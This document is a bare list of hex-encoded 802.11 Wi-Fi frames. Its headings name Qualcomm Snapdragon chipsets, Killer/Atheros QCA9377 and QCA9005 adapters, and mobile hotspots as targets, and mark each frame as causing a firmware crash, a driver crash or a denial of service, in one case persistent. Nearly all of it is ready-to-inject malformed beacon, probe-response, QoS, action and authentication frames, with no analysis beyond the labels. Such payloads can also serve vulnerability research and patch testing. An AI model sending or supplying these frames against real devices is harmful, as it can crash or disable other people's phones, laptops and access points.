## SDM450 | firmware crash / DOS 
\x80\x00\x3A\x01\x4C\xC0\x12\x13\xD5\x1B\x04\xD9\xF5\x26\xFF\xC0\x04\xD9\xF5\x26\xFF\xC0\x80\x1C\x00\x60\xAE\x0A\x00\x00\x00\x00\x64\x00\xF1\xFF\x00\x0A\x77\x66\x5F\x74\x65\x73\x74\x69\x6E\x67\x01\x08\x82\x84\x8B\x96\x12\x24\x48\x6C\x00\x01\x0B\x05\x04\x00\x01\x00\x18\x25\x04\x80\x83\x05\xA3
\x50\x00\x3A\x01\x4C\xC0\x12\x13\xD5\x1B\x04\xD9\xF5\x26\xFF\xC0\x04\xD9\xF5\x26\xFF\xC0\xB0\x30\x00\x10\xB3\x0A\x00\x00\x00\x00\x64\x00\xF1\xFF\x00\x0A\x77\x66\x5F\x74\x65\x73\x74\x69\x6E\x67\x01\x08\x82\x84\x8B\x96\x12\x24\x48\x6C\x00\x01\x0B\x05\x04\x00\x01\x00\x18\x25\x03\x00\x00\x00

## SD855/SD865 | DoS
\x80\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x04\xD9\xF5\x26\xFF\xC0\x04\xD9\xF5\x26\xFF\xC0\x30\x66\x00\x90\x59\x02\x00\x00\x00\x00\x64\x00\x68\x99\x00\x0A\x77\x66\x5F\x74\x65\x73\x74\x69\x6E\x67\x01\x08\x82\x84\x8B\x96\x12\x24\x48\x6C\x05\x04\x00\x01\x00\x18\x03\x01\x0B\x25\x00

## SD660/SD765g | DoS
\x80\x00\x00\x00\x80\xAD\x16\x4A\x84\x54\x04\xD9\xF5\x26\xFF\xC0\x04\xD9\xF5\x26\xFF\xC0\x50\xF2\x00\x10\x86\x05\x00\x00\x00\x00\x64\x00\xF1\xFF\x00\x0A\x77\x66\x5F\x74\x65\x73\x74\x69\x6E\x67\x01\x08\x82\x84\x8B\x96\x12\x24\x48\x6C\x00\x01\x0B\x05\x04\x00\x01\x00\x18\x25\x01\x00

##killer wireless AC 1535(Qualcomm Atheros QCA61x4/QCA9377) AP mode | driver crash
#qos cf-ack
\xD8\x01\x3A\x01\xAE\xB6\xD0\x15\x73\x05\x9C\x2E\xA1\x28\x2B\xAD\x9C\x2E\xA1\x28\x2B\xAD\xB0\xF2\x00\x00\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4\xC4

#qos cf-poll
\xE8\x01\x3A\x01\xAE\xB6\xD0\x15\x73\x05\x9C\x2E\xA1\x28\x2B\xAE\xAE\xB6\xD0\x15\x73\x05\xA0\x39\x00\x00\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04

#qos cf-ack + cf-poll
\xF8\x01\x3A\x01\xAE\xB6\xD0\x15\x73\x05\x9C\x2E\xA1\x28\x2B\xAE\xAE\xB6\xD0\x15\x73\x05\xB0\x39\x00\x00\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3


##Killer Wireless AC 1535(Qualcomm Atheros QCA61x4/QCA9377) | DoS
# probe_response
\x50\x00\x3A\x01\x8C\xC0\x12\x13\xD5\x1B\x04\xD9\xF5\x26\xFF\xC0\x04\xD9\xF5\x26\xFF\xC0\x90\x88\x00\x50\xF6\x04\x00\x00\x00\x00\x64\x00\xF1\xFF\x00\x0A\x77\x66\x5F\x74\x65\x73\x74\x69\x6E\x67\x01\x08\x82\x84\x8B\x96\x12\x24\x48\x6C\x00\x01\x0B\x05\x04\x00\x01\x00\x18\x25\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

# Beacon
\x80\x00\x00\x00\x9C\xB6\xD0\x15\x73\x05\x04\xD9\xF5\x26\xFF\xC0\x04\xD9\xF5\x26\xFF\xC0\x00\xE2\x00\x00\x19\x00\x00\x00\x00\x00\x64\x00\xF1\xFF\x00\x0A\x77\x66\x5F\x74\x65\x73\x74\x69\x6E\x67\x01\x08\x82\x84\x8B\x96\x12\x24\x48\x6C\x00\x01\x0B\x05\x04\x00\x01\x00\x18\x00\x00


# ActionNoAck
\xE0\x00\x3A\x01\x9C\xB6\xD0\x15\x73\x05\x04\xD9\xF5\x26\xFF\xC0\x04\xD9\xF5\x26\xFF\xC0\x10\x43\x04\x04\x04\x04\x04\x04
\xE0\x00\x3A\x01\x9C\xB6\xD0\x15\x73\x05\x04\xD9\xF5\x26\xFF\xC0\x04\xD9\xF5\x26\xFF\xC0\x10\x43\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04


## Snapdragon series(monile personal hotspot) | DoS

# Auth 
\xB0\x00\x3A\x01\xE2\xF3\x12\x19\x85\x55\xAE\x02\xB5\x02\xCA\xA8\xE2\xF3\x12\x19\x85\x55\xF0\xED\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00
\xB0\x00\x3A\x01\xE2\xF3\x12\x19\x85\x55\xAE\x02\xB5\x02\xCA\xA8\xE2\xF3\x12\x19\x85\x55\x70\xBE\x00\x00\x01\x00\x00\x00\x10\x00
\xB0\x00\x3A\x01\xE2\xF3\x12\x19\x85\x55\xAE\x02\xB5\x02\xCA\xA8\xE2\xF3\x12\x19\x85\x55\x70\xBE\x00\x00\x01\x00\x00\x00
\xB0\x00\x3A\x01\xE2\xF3\x12\x19\x85\x55\xAE\x02\xB5\x02\xCA\xA8\xE2\xF3\x12\x19\x85\x55\x70\xBE\x00\x00\x01\x00\x00\x00\xFF\xFF


##QCA9005 | Persistent DoS

#qosdata + cf + acl 
\x98\x02\x3A\x01\x00\x1A\x6B\x0D\xB6\x3F\x04\xD9\xF5\x26\xFF\xC0\x04\xD9\xF5\x26\xFF\xC0\xA0\x22\x00\x00\x6A\x38\xF7\x3C\x96\xF9\x20\x3F\xC6\x48\x0F\x2D\x62\xFB\xD7\x52\xFB\x6C\x2C\xAF\x69\x3B\x77\x8E\x1A\xC7\x62\x8E\x33\x95\x4A\xD1\x88\x50\xF3\xCC\xBC\xAD\x2A\x0B\xD4\xCC\x00\xD1\xED\x74\x4B\x3A\xF2\x6A\x5C\x1B\x11\xEC\xC8\x29\x62\x39\x32\x43\x21